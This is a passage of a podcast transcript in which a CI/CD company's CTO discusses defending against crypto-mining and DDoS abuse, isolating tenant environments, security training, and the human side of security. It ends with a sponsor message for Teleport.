Rob: 00:42:03.151 We're sort of remote code execution as a service. Right? I mean, you have arbitrary compute that we allow you to run on. And for certain levels of accounts, you can use our compute for free. I would say crypto mining is a real thing. We've seen that a lot in the industry where folks are even turning off their free offerings because it's so rampant. We've chosen to battle that to continue to give our customers the opportunity to use the platform what we think is the right value. We're willing to take that on as a burden and have been pretty effective, I think, in shutting it down. So that's probably the big one. Beyond that, just the access to compute is not necessarily particularly valuable to folks because we have fairly limited compute compared to what you can get from other places, I would say. We've seen things like people try to launch DDoS out of one of our VMs, but it's a joke. It doesn't get very far. It gets shut off immediately. They're wasting their time. So it doesn't happen very often.
Rob: 00:43:00.233 The thing that I think is really interesting about attacks of any kind — I worked in email for years and so spam was the thing that we paid a lot of attention to — is ultimately it's an economic question. Right? How much work do I have to put into this and what am I going to get for it? And I remember thinking, "Who even reads these ridiculous emails?" But they wouldn't be sending them year after year if people weren't giving them their bank account numbers or their social security numbers or whatever it is they email asking for. It clearly works, right? So the crypto mining keeps coming up in sort of flares, let's say. and we put it out. And so it kind of comes in waves, but there's still energy going into it, so someone's getting something. The DDoS thing shows up once a year, and then whoever's trying to do it is like, "Well, this wasn't worth my energy," because it doesn't actually do anything. Right? They're trying to use our machines basically as bot machines. It just doesn't work. And so they stopped because they didn't get the return they were trying to get, the investment is high. And so we actually don't see a huge surface of attacks, again, of just using the compute to try to do something else because it's a very constrained system. It's designed for a specific purpose. It's really great for that; not great for sort of arbitrary consumption for other reasons. And so, yeah, pretty limited.
Isolating customer environments
Ben: 00:44:18.272 And then you talked a little about sort of the importance of isolating your customer environments. Can you talk about why that's such an important thing at CircleCI?
Rob: 00:44:25.723 Yeah. I mean, that's real. We have a multitenant environment where customers are running their builds amongst a very large cluster of machines that we operate. And so ensuring that they are isolated from each other. In some places it's a VM, in some places it's containerized and those containers are operating across the machines. So we have multiple layers of isolation from system level calls to what kind of access do you have to how network bridges are built, etc., etc. to ensure that the systems are completely isolated from each other. And so, yes, people are building code. That's the happy path. Going back to my previous statement where you basically have this completely isolated piece of machine on the internet, you're limited in what you can do with that. If all of that was running, all our customers were basically on the same machine and had visibility into everyone else, you could imagine that the opportunities for attacks would be very, very different. And so, yeah, we invest a lot of energy in isolation and making sure that these things are independent from each other.
The non-engineering challenges
Ben: 00:45:33.031 Yeah. And I guess my last question, sort of as CTO — we've sort of talked about some sort of engineering challenges, but I think when we previously talked, a lot of these are also challenges with the organization, the team, and the processes. Can you talk about how you view sort of your team and processes to help solve some of the problems we've discussed?
Rob: 00:45:50.670 Yeah. I mean, I think there's a couple of layers there. First, everyone building software needs to have some fundamental understanding or context around security principles. We spend time talking about what we're building at a high level so people have a concept of where they might be playing into that, the kinds of things that they do. We also invest in — I want to call it training, but we've taken a pretty particular approach of we sort of use capture the flag type exercises and more engineering-oriented like, "This is what it looks like when you actually break into a system," versus, "Here's a presentation about systems," because we feel like that gets people even just a better connection, right, in terms of, "Oh, day-to-day, this is the thing I'm doing." So is that perfect? No. Yeah. As I said, third-party pen testing and stuff like that, but trying to invest in giving people a perspective of how security functions in the world that we're operating in. So I think all of that is important.
Rob: 00:46:47.009 I think the second thing from a human element is so many opportunities — opportunity feels like a bad word. But so many opportunities as an attacker are exposed through the human piece of the puzzle. I mean, there's a reason we all get phishing emails. Right? Again, there's a return on that investment because it works. Right? People want to be helpful. They happily provide information, those sorts of things. And so understanding that no matter how strong your systems are, how well designed your software is, there are pathways for people to perform actions, and you have to think about the human element of your environment. Right? And so this comes back to the multi-key thing as an example, where just at the end of the day, it's always possible for a person to be "compromised", and I'm air quoting, which no one can see. But there are reasons that people will behave in ways that you didn't expect. Right? And I'm not going to spend hours talking about what those might be.
Rob: 00:47:49.643 But just accepting, hey, you know what? This is an important thing. Let's make it require — we talked about multiple sign-offs on a PR. If I can just ship any code into the environment, then we as a business are exposed. So let's make sure that a second person has looked at it. Right? Just give it a reason to have a second look. And there are lots of places where that could be the case. So I think two elements to the human dynamic there. One, making sure people have the context to think about this. As someone who gets to spend a lot of their time looking at the bigger picture, I am well aware of how security plays into our environment, but not every engineer on the entire team is thinking about this stuff all day long. So how do we make sure they have a bit of that context? And then just thinking about humans as a vector, I guess is the right word. Right? So many exploits start with people.
A practical tip to apply to your CI/CD system today
Ben: 00:48:39.292 Great. I think that's a good place to end. It's been fun. I've learnt a lot. Just to close things out. do you have one practical tip that people could apply to the CI/CD systems today?
Rob: 00:48:50.449 Just one?
Ben: 00:48:51.322 Just one.
Rob: 00:48:52.241 Reduce your build time. Let's just start there. If you want to be able to mitigate issues, make sure that you can deliver confidently at any given time and that it's fast. That will fix far more than just your security.
Ben: 00:49:03.108 Awesome. Thanks, Rob.
Rob: 00:49:04.109 Thanks, Ben. It's been great.
Ben: 00:49:05.535 [music] This podcast is brought to you by Teleport. Teleport is the easiest most secure way to access all your infrastructure. The open-source Teleport access planes consolidate connectivity, authentication, authorization, and auditing into a single platform. By consolidating all aspects of infrastructure access, Teleport reduces the attack surface area, cuts operational overhead, easily enforces compliance, and improves engineering productivity. Learn more at goteleport.com or find us on GitHub, github.com/gravitational/teleport.